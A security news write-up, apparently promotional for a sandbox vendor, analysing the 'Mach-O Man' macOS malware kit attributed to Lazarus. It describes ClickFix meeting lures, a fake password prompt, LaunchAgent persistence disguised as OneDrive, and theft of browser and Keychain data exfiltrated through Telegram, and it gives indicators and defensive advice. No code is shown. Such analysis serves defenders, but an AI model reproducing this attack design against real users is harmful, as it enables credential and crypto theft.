North Korea’s state-sponsored Lazarus Group has unleashed a newly identified, modular macOS malware kit dubbed “Mach-O Man” a sophisticated, four-stage attack chain targeting fintech executives, crypto developers, and high-value enterprise users through fake meeting invitations and social engineering lures.
Analyzed by Mauro Eldritch in collaboration with ANY.RUN’s interactive sandbox platform, Mach-O Man, is a Go-compiled malware kit built as native Mach-O binaries, making it fully compatible with both Intel and Apple Silicon Macs.
See live sandbox analysis of fake Mach-O Man kit apps
Attributed to Lazarus’s Chollima division, the kit marks a significant escalation in the group’s targeting of Apple ecosystems, a platform historically perceived as more secure, but increasingly in the crosshairs of state-sponsored threat actors.
Since 2017, Lazarus has accumulated approximately $6.7 billion in stolen crypto assets, and researchers have already linked over $500 million in recent exploits to this group’s activity.
Mach-O Man Attacking macOS Users
The attack begins not with a software exploit, but with a deceptively simple social engineering technique known as ClickFix.
Victims, typically business leaders in Web3, fintech, or crypto circles, receive an urgent Telegram message from a compromised or impersonated contact, containing what appears to be a legitimate invitation to a Zoom, Microsoft Teams, or Google Meet session.
The link redirects to a convincing fake collaboration platform (e.g., update-teams[.]live or livemicrosft[.]com) that displays a simulated connection error, prompting the user to paste and execute a terminal command to “fix” the issue.
.webp)
That single terminal command silently deploys teamsSDK.bin, the kit’s initial stager.
Once execution begins, Mach-O Man operates across four distinct phases:
Stage 1 – The Stager (teamsSDK.bin): Downloads a fake macOS application bundle impersonating Zoom, Teams, or Google Meet; applies an ad-hoc code signature to bypass macOS execution controls; prompts the victim for their password three times, with the window shaking on first two attempts to simulate authentication failure before silently accepting credentials.
Stage 2 – The Profiler (D1YrHRTg.bin / variants): Registers the host with the C2 server and collects a comprehensive system profile — including hostname, CPU type, boot time, OS version, running processes, network configuration, and a full inventory of installed browser extensions across Chrome, Firefox, Safari, Brave, Opera, and Vivaldi.
.webp)
Stage 3 – Persistence (minst2.bin): Creates a folder named “Antivirus Service,” drops a binary disguised as OneDrive, and installs a LaunchAgent (com.onedrive.launcher.plist) to ensure the malware kit re-executes on every login.
Stage 4 – The Stealer (macrasv2): Harvests browser credentials, session cookies, SQLite-stored data, and macOS Keychain entries, packages everything into user_ext.zip, and exfiltrates it via the Telegram Bot API — a trusted channel that blends into normal traffic. A self-deletion script (delete_self.sh) then wipes all components using the native rm command.
Despite the campaign’s sophistication, researchers identified notable OPSEC weaknesses. The operators exposed their Telegram bot token, allowing third parties to read the bot’s messages, send messages on its behalf, and even identify the operator, significantly aiding takedown efforts.
See sandbox analysis of macrasv2
.webp)
Several modules also contain faulty logic, including a profiler component that enters an infinite loop, repeatedly posting system data to the C2, and potentially triggering resource exhaustion alerts on the victim’s machine.
.webp)
Security teams should treat any unexpected terminal command prompt, even one embedded in a seemingly routine meeting workflow, as a high-confidence social engineering indicator.
SOC teams are advised to audit LaunchAgents for files masquerading as OneDrive or Antivirus Service directories, block terminal-based ClickFix lures at the endpoint level, and deploy cross-platform sandboxing tools capable of analyzing macOS-native Mach-O binaries in real time.
A single compromised macOS device in a fintech or crypto environment can provide full access to production infrastructure, SaaS platforms, and digital asset wallets making early detection critical before credential data is already exfiltrated.
Reduce MTTR by 21 minutes in your SOC. Upgrade Tier 1 productivity with ANY.RUN. Contact us
